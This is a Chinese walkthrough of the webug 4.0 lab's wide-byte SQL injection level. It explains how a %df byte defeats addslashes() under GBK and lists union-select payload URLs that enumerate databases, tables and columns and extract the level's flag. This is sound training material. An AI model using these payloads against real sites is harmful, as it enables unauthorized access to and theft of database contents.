webug4.0宽字节注入-6

0x00  前言

GBK是一种多字符编码,一个汉字占2个字节,utf-8编码的汉字占3个字节。

addslashes() 函数会对括号里  (') 、(")、 (\)、 (NULL)、的四个字符添加反斜杠并将其返回。

Mysql有一个特性,在进行GBK编码时会将两个字符认为一个汉字(前提是第一个字符的ASCII大于128才能达到汉字范围)。

如果SQL输入经过了addslashes() 函数处理,我们输入' 时 会变成 \’。一般绕过的方法有两种

1. 将 \' 前面的 斜杠 进行转义 \\' 这样单引号就能绕过,逃逸出来

2. 想办法去掉前面的\ 

 

0x01  实践1

看到网址尝试在后面添加单引号,但是页面并没有什么变化,因为已经知道是宽字节注入,所以添加%df'

页面报错了:

可以看到单引号 ' 变成了 \'   %df没有显示出来,但我们知道%df转化成10进制是223 大于128,与后面反斜杠 \  的16进制%5c 合成一个汉字,使得单引号逃逸出来。这也是上面说的第2个方法。

0x02  实践2

我们再添加 %df\'   会变成 %df5c5c5c27  %df5c 会组成一个汉字 而%5c5c会进行转义 后面的单引号逃逸

我们再添加 %dfdf' 会变成 %dfdf5c27   %dfdf 会组成一个汉字(至少是个宽字节) 而%5c与%27依旧是 \'

0x03  注入

剩下过程与前面几关类似

接下来判断字段数  判断结果为2

http://localhost/control/sqlinject/width_byte_injection.php?id=1%df' order by 2--+

爆出数据库名字

http://localhost/control/sqlinject/width_byte_injection.php?id=-1%df' union select 1,schema_name from information_schema.schemata --+

数据库名字:information_schema,challenges,mysql,performance_schema,security,test,webug,webug_sys,webug_width_byte

爆数据库webug下的表

http://localhost/control/sqlinject/width_byte_injection.php?id=-1%df' union select 1,table_name from information_schema.tables where table_schema=0x7765627567--+

webug下的表:data_crud,env_list,env_path,flag,sqlinjection,user,user_test

爆env_list的列

http://localhost/control/sqlinject/width_byte_injection.php?id=-1%df' union select 1,column_name from information_schema.columns where table_name=0x656e765f6c697374--+

env_list的表里有:id,envName,envDesc,envIntegration,delFlag,envFlag,level,type

爆本题flag

http://localhost/control/sqlinject/width_byte_injection.php?id=-1%df' union select 1,envFlag from webug.env_list where id=6 --+

flag:dfsadfsadfas

 

 

 


转载记得标明来源:https://www.cnblogs.com/yuuki-aptx/

 

转载于:https://www.cnblogs.com/yuuki-aptx/p/10548307.html

你可能感兴趣的:(webug4.0宽字节注入-6)